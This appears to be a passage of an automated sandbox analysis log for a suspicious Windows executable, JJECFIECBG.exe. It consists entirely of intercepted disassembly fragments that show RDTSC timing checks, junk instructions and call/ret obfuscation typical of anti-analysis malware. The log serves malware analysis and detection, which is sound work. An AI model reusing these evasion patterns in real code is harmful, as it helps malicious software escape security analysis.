Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83AC23 second address: 83ACBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FB1C8D0EF75h 0x00000012 nop 0x00000013 jmp 00007FB1C8D0EF6Dh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FB1C8D0EF68h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 jmp 00007FB1C8D0EF6Bh 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FB1C8D0EF6Ch 0x00000041 mov ebx, dword ptr [ebp+122D3BA6h] 0x00000047 pop edi 0x00000048 pop edi 0x00000049 xchg eax, esi 0x0000004a push esi 0x0000004b pushad 0x0000004c jmp 00007FB1C8D0EF75h 0x00000051 jnc 00007FB1C8D0EF66h 0x00000057 popad 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83ACBB second address: 83ACBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83ACBF second address: 83ACC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83ACC3 second address: 83ACD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1C8B21D3Bh 0x0000000d rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83CD18 second address: 83CD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF72h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83CD33 second address: 83CD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83CD37 second address: 83CD49 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FB1C8D0EF6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83CD49 second address: 83CD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83CD51 second address: 83CD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB1C8D0EF66h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83D441 second address: 83D44B instructions: 0x00000000 rdtsc 0x00000002 js 00007FB1C8B21D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83E314 second address: 83E327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF6Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F338 second address: 83F3D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB1C8B21D38h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 call 00007FB1C8B21D47h 0x0000002d call 00007FB1C8B21D47h 0x00000032 and di, 19C4h 0x00000037 pop ebx 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b mov di, 794Ch 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007FB1C8B21D38h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D1E54h] 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push edi 0x00000066 pop edi 0x00000067 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F3D6 second address: 83F3E9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FB1C8D0EF66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8404DA second address: 8404DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8404DE second address: 84053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FB1C8D0EF71h 0x0000000d nop 0x0000000e jp 00007FB1C8D0EF6Ah 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FB1C8D0EF68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov bx, di 0x00000035 xchg eax, esi 0x00000036 push ebx 0x00000037 jne 00007FB1C8D0EF68h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FB1C8D0EF6Bh 0x00000046 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 84053F second address: 840545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 841508 second address: 84150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 84150C second address: 841516 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 844674 second address: 8446D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov bx, 8C00h 0x00000010 mov edi, dword ptr [ebp+122D396Ah] 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+12443F8Eh], edx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FB1C8D0EF68h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a jmp 00007FB1C8D0EF77h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 pop edi 0x00000046 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8446D3 second address: 8446DD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8464D9 second address: 846567 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB1C8D0EF70h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB1C8D0EF68h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ebx, edi 0x0000002d add dword ptr [ebp+122D2CEEh], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007FB1C8D0EF68h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f push edi 0x00000050 pop ebx 0x00000051 push esi 0x00000052 mov edi, dword ptr [ebp+122D396Ah] 0x00000058 pop ebx 0x00000059 xchg eax, esi 0x0000005a jmp 00007FB1C8D0EF6Dh 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jp 00007FB1C8D0EF66h 0x00000069 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8485AD second address: 8485B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8495B4 second address: 8495BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 84A51E second address: 84A527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7E849E second address: 7E84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 833818 second address: 83381C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 839E23 second address: 839E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 839E29 second address: 839E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 839E2E second address: 839E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 839E33 second address: 839E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D3Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 839E4E second address: 839E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F565 second address: 83F56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F56C second address: 83F573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F573 second address: 83F588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB1C8B21D36h 0x00000015 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F588 second address: 83F58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 83F635 second address: 83F63A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 843760 second address: 843764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 843764 second address: 843784 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB1C8B21D3Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 843784 second address: 84383C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1C8D0EF6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB1C8D0EF68h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c call 00007FB1C8D0EF75h 0x00000031 call 00007FB1C8D0EF74h 0x00000036 mov edi, dword ptr [ebp+122D2D86h] 0x0000003c pop edi 0x0000003d pop edi 0x0000003e mov ebx, dword ptr [ebp+1243D2B5h] 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov di, bx 0x0000004e jns 00007FB1C8D0EF6Ch 0x00000054 mov eax, dword ptr [ebp+122D14F1h] 0x0000005a mov bx, cx 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push edx 0x00000062 call 00007FB1C8D0EF68h 0x00000067 pop edx 0x00000068 mov dword ptr [esp+04h], edx 0x0000006c add dword ptr [esp+04h], 00000019h 0x00000074 inc edx 0x00000075 push edx 0x00000076 ret 0x00000077 pop edx 0x00000078 ret 0x00000079 mov di, ax 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 84383C second address: 843843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 843843 second address: 843849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 843849 second address: 84384D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 845752 second address: 845756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 847746 second address: 847758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007FB1C8B21D44h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 847758 second address: 84775C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8487A0 second address: 8487A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8487A4 second address: 8487AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 84A85D second address: 84A861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7F5FD7 second address: 7F5FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 7F5FDB second address: 7F5FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8534E3 second address: 8534E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8534E9 second address: 8534EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8534EF second address: 8534F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8534F3 second address: 8534F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8537DB second address: 8537E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8537E1 second address: 8537E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 8537E5 second address: 8537F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858F9D second address: 858FA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858FA3 second address: 858FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8D0EF74h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858FBB second address: 858FDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858FDA second address: 858FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858FDE second address: 858FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 858FF3 second address: 85900C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1C8D0EF6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85923E second address: 859265 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB1C8B21D38h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FB1C8B21D45h 0x00000018 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 859265 second address: 68ED4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FB1C8D0EF76h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007FB1C8D0EF70h 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e popad 0x0000001f pop eax 0x00000020 cld 0x00000021 push dword ptr [ebp+122D02D9h] 0x00000027 jo 00007FB1C8D0EF77h 0x0000002d jmp 00007FB1C8D0EF71h 0x00000032 call dword ptr [ebp+122D2CC3h] 0x00000038 pushad 0x00000039 add dword ptr [ebp+122D3197h], edx 0x0000003f mov dword ptr [ebp+122D3197h], eax 0x00000045 xor eax, eax 0x00000047 jmp 00007FB1C8D0EF70h 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 js 00007FB1C8D0EF6Dh 0x00000056 jc 00007FB1C8D0EF67h 0x0000005c stc 0x0000005d mov dword ptr [ebp+122D3BA6h], eax 0x00000063 mov dword ptr [ebp+122D1D4Fh], ecx 0x00000069 mov esi, 0000003Ch 0x0000006e or dword ptr [ebp+122D1D4Fh], ebx 0x00000074 add esi, dword ptr [esp+24h] 0x00000078 add dword ptr [ebp+122D1D4Fh], esi 0x0000007e jnp 00007FB1C8D0EF6Ch 0x00000084 add dword ptr [ebp+122D1D4Fh], ecx 0x0000008a lodsw 0x0000008c cld 0x0000008d add eax, dword ptr [esp+24h] 0x00000091 jmp 00007FB1C8D0EF73h 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a sub dword ptr [ebp+122D3197h], ebx 0x000000a0 push eax 0x000000a1 je 00007FB1C8D0EF70h 0x000000a7 push eax 0x000000a8 push edx 0x000000a9 pushad 0x000000aa popad 0x000000ab rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85F542 second address: 85F554 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB1C8B21D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85F554 second address: 85F566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF6Eh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85F566 second address: 85F56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85F56A second address: 85F58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FB1C8D0EF74h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85F58E second address: 85F596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85E24E second address: 85E2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF77h 0x00000007 jnc 00007FB1C8D0EF66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB1C8D0EF72h 0x00000017 pop edx 0x00000018 je 00007FB1C8D0EF6Ch 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop edi 0x00000024 jno 00007FB1C8D0EF66h 0x0000002a jg 00007FB1C8D0EF66h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85E2A4 second address: 85E2AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85E2AC second address: 85E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85E91C second address: 85E935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1C8B21D44h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85E935 second address: 85E93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85EA8F second address: 85EA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JJECFIECBG.exe	RDTSC instruction interceptor: First address: 85EED4 second address: 85EED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
